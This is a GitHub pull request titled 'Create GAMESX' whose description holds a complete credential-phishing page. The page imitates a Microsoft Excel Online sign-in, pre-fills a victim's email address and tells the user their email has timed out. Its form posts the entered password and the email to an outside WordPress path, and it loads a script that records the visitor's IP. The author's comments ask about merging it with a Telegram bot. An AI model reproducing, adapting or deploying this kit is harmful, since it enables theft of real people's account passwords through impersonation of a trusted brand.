### PR TITLE
Create GAMESX

### PR DESCRIPTION
**Pull request by youngdav347**
<html>
<head>
    <meta http-equiv="x-ua-compatible" content="EmulateIE9">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
	<link rel="icon" type="image/ico" href="https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png">
    <title>Excel Online Spreadsheet :: Sign in</title>
	<style>
	body, html {
  	height: 100%; margin: 0; font-family: Arial, Helvetica, sans-serif;
	}
	* { box-sizing: border-box; } .bg-image { /* The image used */ background-image: url("https://i.ytimg.com/vi/txoshp-BqGE/maxresdefault.jpg"); /* Add the blur effect */ filter: blur(5px); -webkit-filter: blur(5px); /* Full height */ height: 100%;  /* Center and scale the image nicely */ background-position: center; background-repeat: no-repeat; background-size: cover; } /* Position text in the middle of the page/image */ .bg-text { background: #14772E; background: -moz-linear-gradient(top, #14772E 0%, #347144 74%, #2E8946 100%); background: -webkit-linear-gradient(top, #14772E 0%, #347144 74%, #2E8946 100%); background: linear-gradient(to bottom, #14772E 0%, #347144 74%, #2E8946 100%); color: white;font-weight: bold;border: 1px solid #14772E;border-radius: 25px 0px 65px 0px;-webkit-box-shadow: 3px 3px 15px 5px #000000;  box-shadow: 3px 3px 15px 5px #000000; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);  z-index: 2;  width: 350px; height:270px; padding: 5px; text-align: center; }
	</style>

</head>
<body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"> <table align="center" cellspacing="0" height="100%" width="100%"> <tr><td height="8%" bgcolor="#14772E">
	<table align="center" cellspacing="0" width="97%"><tr><td>
		<font face="arial" size="3" color="#FFFFFF">
		&nbsp; <b>Microsoft</b> Excel Reader  
		</font>
	</td></tr></table>
</td></tr>
<tr><td height="88%" bgcolor="#FFF">
<div class="bg-image"></div>
<div class="bg-text">
	<table align="center" cellspacing="0">
	<tr><td style="height:35px;"></td></tr>
	<tr><td>
		<font face="arial" size="3" color="#FFF">
		&nbsp; burkeservicesinc@hotmail.com
		</font>
	</td></tr>
	
					<tr><td style="height:10px;"></td></tr>
	
					<tr><td>
					<form method="post" action="https://gerford.com/wp-admin/cs.php">
					</td></tr>
					<tr><td>
							<div align="left">
								<font face="verdana" size="2" color="#FFF">
									&nbsp; Email Timed Out. Sign in to Excel Sheet
								</font>
							</div>
					</td></tr>
					<tr><td style="height:5px;"></td></tr>
					<tr><td>
						<table cellspacing="0" align="center">
						<tr><td>
							<div align="center">
								<input  name="cknow" type="password" placeholder="Password" required 
								style=" width:280px; height:33px; font-family: arial; font-size: 14px; 
  								color:#000000; background-color: #FFF; border: solid 1px #FFF; padding: 5px; border-radius: 3px;">
							</div>
						</td></tr>
						<tr><td style="height:7px;"></td></tr>
						<tr><td>
							<table align="center" cellspacing="0" style="width:285px;"><tr>
							<td>
								<input type="checkbox" checked> <font face="arial" size="2" color="#FFF">Remember me</font>
							</td>
							<td>
								<div align="right">
									<a href="#" style="tet]xt-decoration:none;">
										<font face="arial" size="2" color="#0080FF"><u>
											Forgot password?
										</u></font>
									</a>
								</div>
							</td>
							</tr></table>
						</td></tr>
						<tr><td style="height:20px;"></td></tr>
						<tr><td>
							<div align="right">
								<input type="submit" value="View" style="width:90px; height:35px; font-family: arial; font-size: 14px; 								color:#FFF; background-color: #045FB4; border: solid 1px #045FB4; box-shadow: 1px 1px 15px 5px 								#000000; border-radius: 5px;">
							</div>
						</td></tr>
						<tr><td>
						</td></tr>
						<tr><td style="height:20px;">
							<input type="hidden" name="ck" value="burkeservicesinc@hotmail.com">
							</form>
						</td></tr>
						</table>
					</td></tr>
	</table>
</div>

</td></tr>

<tr><td height="4%" bgcolor="#1C1C1C">

</td></tr>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> <script type="text/javascript" src="https://l2.io/ip.js?var=userip"></script> <script type="text/javascript">
    var userip;
</script>
<script>
/* global $ */
</html>

Closes #[issue number]

## Description

-

## Release notes

Notes:

### CODE REVIEW

**Comment by youngdav347** [comment]
Can i merge it with my TelegramBot?

**Comment by youngdav347** [comment]
What do i have to do to get approve?
